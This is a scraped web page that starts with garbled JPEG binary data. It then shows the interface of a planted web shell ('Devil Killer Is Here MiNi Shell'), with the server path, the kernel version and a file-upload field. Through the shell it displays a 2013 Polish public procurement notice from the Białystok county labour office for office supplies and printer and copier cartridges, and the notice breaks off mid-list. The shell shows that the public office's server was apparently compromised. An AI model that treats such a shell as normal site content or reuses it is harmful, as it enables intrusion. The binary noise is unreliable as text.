JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131210/267391-N-2013.html

<p class="kh_header"><b>Białystok: Dostawa artykułów biurowych, papierniczych i papieru kserograficznego oraz wkładów barwiących, drukujących, powielaczy i akcesoriów komputerowych.</b><br>
<b>Numer ogłoszenia: 267391 - 2013; data zamieszczenia: 10.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Białymstoku , ul. Pogodna 63/1, 15-365 Białystok, woj. podlaskie, tel. 85 747 3800, faks 85 747 3861.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych, papierniczych i papieru kserograficznego oraz wkładów barwiących, drukujących, powielaczy i akcesoriów komputerowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia został podzielony na dwie części:
I.	Dostawa artykułów biurowych, papierniczych i papieru kserograficznego; 
II.	Dostawa wkładów barwiących, drukujących, powielaczy i akcesoriów komputerowych.
2.	Szczegółowy opis przedmiotu zamówienia części I i II zawarty został w Załączniku Nr 1 do SIWZ.
3.	Podane szacunkowe ilości w części I i II służą określeniu wielkości przedmiotu zamówienia i wyliczenia ceny ofertowej. 
4.	Zamawiający zastrzega sobie prawo do zmiany ilości danego rodzaju w każdym czasie, a Wykonawca nie będzie dochodził roszczeń z tytułu dokonywanych zmian ilościowych i rodzajowych w trakcie realizacji umowy w ramach wartości nominalnej zobowiązania umownego. 
5.	Produkty z części I i II będą zamawiane sukcesywnie, dokonywane telefonicznie, faksem lub pocztą elektroniczną. 
6.	Realizacja zamówień będzie dokonywana do 2 dni od dnia złożenia zamówienia. 
7.	Wykonawca dostarczać będzie przedmiot zamówienia na własny koszt i ryzyko, własnymi siłami, 
w ustalonym terminie, do wskazanego miejsca w siedzibie Zamawiającego.
8.	Dostarczane produkty (I i II części) muszą być nowe, wolne od wad, dobrej jakości oraz muszą spełniać wymogi Polskich Norm.
9.	W przypadku stwierdzenia przez Zamawiającego wad dostarczonych produktów Wykonawca wymieni je niezwłocznie na nowe, pozbawione wad, nie później niż 3 dni robocze od dnia zgłoszenia zamówienia.
10.	Wykonawca na dostarczane produkty udzieli gwarancji zgodnie z gwarancją producenta (dotyczy produktów 
z I i II części).
11.	 Wymagania dotyczące sposobu realizacji zamówienia dla części I i II:
I.	Artykuły biurowe, papiernicze i papier kserograficzny; 
1)	Podane parametry techniczne mają charakter podstawowy, w związku z tym oferowany asortyment może charakteryzować się lepszymi parametrami, dotyczy to także asortymentu posiadającego zapis  równoważne;
2)	Minimalny okres gwarancji nie krótszy niż:
-24 miesięcy na: dziurkacze, kalkulatory i zszywacze.
II.	Wkłady barwiące, drukujące, powielacze oraz akcesoria komputerowe.
1)	Zamawiający wymaga materiałów eksploatacyjnych oryginalnych, tj. wyprodukowanych przez producenta urządzeń, które przedstawiono w Załączniku Nr 1 do SIWZ w Części II.
2)	Opis potrzeb Zamawiającego zawiera typ sprzętu, jakim dysponuje i orientacyjne ilości. 
3)	Produkty muszą być fabrycznie opakowane oraz fabrycznie nowe. 
a)	fabrycznie nowe: 
-	produkty wykonane z nowych elementów tzn. nowe dysze, tusz, nie noszące śladów uszkodzeń zewnętrznych oraz uprzedniego używania, 
-	w oryginalnych opakowaniach producenta z widocznym logo, symbolem produktu 
i terminem przydatności do użytku, 
-	posiadające wszelkie zabezpieczenia szczelności zbiorników z tonerem. 
b)	równoważny tzn. produkt kompatybilny ze sprzętem, do którego jest zamówiony, 
o parametrach takich samych bądź lepszych (pojemność tuszu   tonera, wydajność i jakość wydruku) w stosunku do oryginału produkowanego przez producenta urządzenia;
4)	Wykonawca gwarantuje, że dostarczone tonery i wkłady drukujące będą wysokiej jakości oraz zapewniają kompatybilność pracy z urządzeniami Zamawiającego, zapewniają należyte bezpieczeństwo oraz posiadają właściwe opakowanie i oznakowanie;
5)	Wykonawca gwarantuje, że zamontowanie i używanie dostarczonych przez niego wkładów drukujących nie spowoduje utraty praw gwarancji producenta urządzenia do którego są przeznaczone; 
6)	Wykonawca składając ofertę na produkty równoważne musi dołączyć stosowne certyfikaty/dokumenty potwierdzające zgodności techniczne (raport z testów wydajności, w tym wydajności określonych na podstawie norm ISO IEC 19752 dla tonerów monochromatycznych, ISO IEC 24711 dla wkładów atramentowych, ISO IEC 19798 dla kaset do kolorowych drukarek laserowych lub norm równoważnych).
7)	Jeśli w trakcie umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych artykułów niekorzystnie odbiega od parametrów produktu oryginalnego lub jeśli produkt nie sygnalizuje we właściwy sposób stanu zużycia tonera, Wykonawca na żądanie Zamawiającego wymieni materiały eksploatacyjne na produkty nowe, spełniające wymagania Zamawiającego bez zmiany ceny w terminie 2 dni od zgłoszenia zawiadomienia;
8)	Wykonawca złoży oświadczenie, że w przypadku uszkodzenia urządzenia, którego przyczyną będzie użycie dostarczonych materiałów eksploatacyjnych innych niż oryginalne, Wykonawca zobowiązany jest do naprawy urządzenia w siedzibie Zamawiającego w terminie 2 dni od zgłoszenia uszkodzenia, a w przypadku konieczności naprawy specjalistycznej w terminie 5 dni od zgłoszenia oraz pokrycie kosztów tej naprawy i przejmie odpowiedzialność za straty, które Zamawiający poniesie, w tym związane z utratą gwarancji (Załącznik Nr 9 do SIWZ);
9)	Wykonawca zobowiązany będzie również do pokrycia kosztów ekspertyzy w przypadku, gdy będzie z niej wynikać, iż awaria lub uszkodzenie urządzenia spowodowane zostały zastosowaniem dostarczonego równoważnika;
10)	W przypadku, gdy naprawa będzie niemożliwa Wykonawca zobowiązuje się do wymiany sprzętu na nowy o tej samej jakości;
11)	Dostarczone materiały eksploatacyjne muszą posiadać na opakowaniach zewnętrznych:
-	logo producenta, 
-	nazwę (typ, symbol) materiału, 
-	numer katalogowy, 
-	opis zawartości,
-	termin przydatności do użycia,
12)	Minimalny okres gwarancji, przydatności, uważa się datę ważności udzieloną przez producenta (tłoczoną na opakowaniu), lecz nie mniej niż: 
-12 miesięcy od dnia dostarczenia towaru - dotyczy wkładów barwiących, drukujących i powielaczy;
-24 miesiące od dnia dostarczenia towaru - dotyczy kaset czyszczących, klawiatur i myszy komputerowej, bezprzewodowej, pendrive;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8, 30.12.51.00-2, 30.12.14.00-7, 30.19.00.00-7, 30.19.20.00-1, 30.19.21.13-6, 30.19.76.44-2, 30.23.72.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku. Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy wykazania, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączy dowody, czy zostały wykonane lub są wykonywane należycie  (Załącznik Nr 5 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku. Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku. Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku. Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy, Białystok, ul. Pogodna 63/1, pokój nr 301 (III piętro) sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 14:00, miejsce: Powiatowy Urząd Pracy, Białystok, ul. Pogodna 63/1, pokój nr 301 (III piętro) sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa wkładów barwiących, drukujących, powielaczy i akcesoriów komputerowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Urządzenie	Ilość/ szt.
1.		Atramentowy wkład czarny do drukarki           
Lexmark C 780 
wydajność: 6 000 stron ( 5% pokrycia)	4
2.		Atramentowy wkład niebieski do drukarki        
Lexmark C 780 
wydajność: 6 000 stron ( 5% pokrycia)	4
3.		Atramentowy wkład purpurowy do drukarki   
Lexmark C 780 
wydajność: 6 000 stron ( 5% pokrycia)	4
4.		Atramentowy wkład żółty do drukarki          Lexmark C 780 
wydajność: 6 000 stron ( 5% pokrycia)	4
5.		Atramentowy wkład czarny do drukarki
 HP Color Laser Jet CP 3525 dn, 
wydajność: 10 500 stron, ( 5% pokrycia)                                                 	4
6.		Atramentowy wkład niebieski do drukarki           
 HP Color Laser Jet CP 3525 dn, 
wydajność: 7 000 stron, ( 5% pokrycia)                                                 	4
7.		Atramentowy wkład purpurowy do drukarki           
HP Color Laser Jet CP 3525 dn, 
wydajność: 7 000 stron, ( 5% pokrycia)                                                 	4
8.		Atramentowy wkład żółty do drukarki          
 HP Color Laser Jet CP 3525 dn, 
wydajność: 7 000 stron, ( 5% pokrycia)                                                 	4
9.		Atramentowy wkład czarny do drukarki          
 HP Color Laser Jet CP 4025, 
wydajność: 8 500 stron, ( 5% pokrycia)                                                 	4
10.		Atramentowy wkład niebieski do drukarki           
HP Color Laser Jet CP 4025, 
wydajność: 11 000 stron, ( 5% pokrycia)                                                	4
11.		Atramentowy wkład purpurowy do drukarki           
HP Color Laser Jet CP 4025, 
wydajność: 11 000 stron, ( 5% pokrycia)                                                 	4
12.		Atramentowy wkład żółty do drukarki           
HP Color Laser Jet CP 4025, 
wydajność: 11 000 stron, ( 5% pokrycia)                                                 	4
13.		Atramentowy wkład czarny do drukarki           
HP Laser Jet Ent 500 Color M 551 dn, 
wydajność: 8 500 stron, ( 5% pokrycia)                                                 	4
14.		Atramentowy wkład niebieski do drukarki           
HP Laser Jet Ent 500 Color M 551 dn,
wydajność: 11 000 stron, ( 5% pokrycia)                                 	4
15.		Atramentowy wkład purpurowy do drukarki      
HP Laser Jet Ent 500 Color M 551 dn, 
wydajność: 11 000 stron, ( 5% pokrycia)                                                 	4
16.		Atramentowy wkład żółty do drukarki          
HP Laser Jet Ent 500 Color M 551 dn, 
wydajność: 11 000 stron, ( 5% pokrycia)                                                 	4
17.		Atramentowy wkład czarny do drukarki      
HP Desk Jet 3820, 
wydajność: 495 stron, ( 5% pokrycia)                                                 	8
18.		Atramentowy wkład czarny do drukarki       
HP Desk Jet 1220C, 1280, 
wydajność: 833 stron, ( 5% pokrycia)                                                 	8
19.		Atramentowy wkład kolorowy do drukarki        
HP Desk Jet 1220C, 1280, 3820, 
wydajność: 450 stron, ( 15% pokrycia)                                                 	8
20.		Atramentowy wkład czarny do drukarki        
HP Desk Jet 5940, 
wydajność: 800 stron, ( 5% pokrycia)                                                 	8
21.		Atramentowy wkład kolorowy do drukarki       
HP Desk Jet 5940, 
wydajność: 450 stron, ( 15% pokrycia)                                                 	4
22.		Atramentowy wkład czarny do drukarki        
HP Desk Jet 460, 
wydajność: 480 stron, ( 5% pokrycia)                                                 	8
23.		Atramentowy wkład kolorowy do drukarki       
HP Desk Jet 460, 
wydajność: 260 stron, ( 15% pokrycia)                                                 	4
24.		Atramentowy wkład czarny do drukarki        
HP Offiece Jet 100, 
wydajność: 480 stron, ( 5% pokrycia)                                                 	8
25.		Atramentowy wkład kolorowy do drukarki     
HP Offiece Jet 100, 
wydajność: 560 stron, ( 15% pokrycia)                                                 	4
26.		Wkład drukujący, czarny do drukarki 
HP Laser Jet 1015,1020, 1022
wydajność: 2 000 stron, ( 5% pokrycia)                                                 	40
27.		Wkład drukujący, czarny do drukarki 
HP Laser Jet 1320, 
wydajność: 2 500 stron, ( 5% pokrycia)                                                 	3
28.		Wkład drukujący, czarny do drukarki 
HP Laser Jet M 3027,
wydajność: 6 500 stron, ( 5% pokrycia)                                                 	4
29.		Wkład drukujący, czarny do drukarki 
HP Laser Jet P 2015 D, 
wydajność: 3 000 stron,( 5% pokrycia)                                                 	50
30.		Wkład drukujący, czarny do drukarki 
HP Laser Jet P 2055 d 
wydajność: 6 500 stron, ( 5% pokrycia)	10
31.		Wkład drukujący, czarny do drukarki 
HP Laser Jet P 4014 dn, 
wydajność: 10 000 stron,( 5% pokrycia)                                                 	10
32.		Wkład drukujący, czarny do drukarki 
HP Laser Jet Pro 400 M 401 dne, 
wydajność: 2 700 stron, ( 5% pokrycia)                                                 	50

Wkłady do kserokopiarek
L.p.	Urządzenie	Ilość/szt
1	Wkład barwiący, cyan, do kserokopiarki 
Konica Minolta Bizhub C 200, 
wydajność:18 500 stron (5% pokrycie)	3
2	Wkład barwiący, czarny, do kserokopiarki 
Konica Minolta Bizhub C 200, 
wydajność:24 000 stron (5% pokrycie)	3
3	Wkład barwiący, magenta, do kserokopiarki 
Konica Minolta Bizhub C 200,
 wydajność:18 500 stron (5% pokrycie)	3
4	Wkład barwiący, yellow, do kserokopiarki 
Konica Minolta Bizhub C 200, 
wydajność:18 500 stron (5% pokrycie)	3
5	Wkład barwiący, cyan, do kserokopiarki 
Sharp MX 2310 U, 
wydajność: 26 800 stron (5% pokrycie)	3
6	Wkład barwiący, czarny, do kserokopiarki 
Sharp MX 2310 U, 
wydajność: 34 200 stron (5% pokrycie)	4
7	Wkład barwiący, magenta, do kserokopiarki Sharp MX 2310 U, 
wydajność: 26 800 stron (5% pokrycie)	3
8	Wkład barwiący, yellow, do kserokopiarki 
Sharp MX 2310 U, 
wydajność: 26 800 stron (5% pokrycie)	3
9	Wkład barwiący, cyan, do kserokopiarki
Toshiba e-Studio 2040c, 
wydajność: 26 800 stron (5% pokrycie)	6
10	Wkład barwiący, czarny, do kserokopiarki
Toshiba e-Studio 2040c, 
wydajność: 34 200 stron (5% pokrycie)	6
11	Wkład barwiący, magenta, do kserokopiarki
Toshiba e-Studio 2040c, 
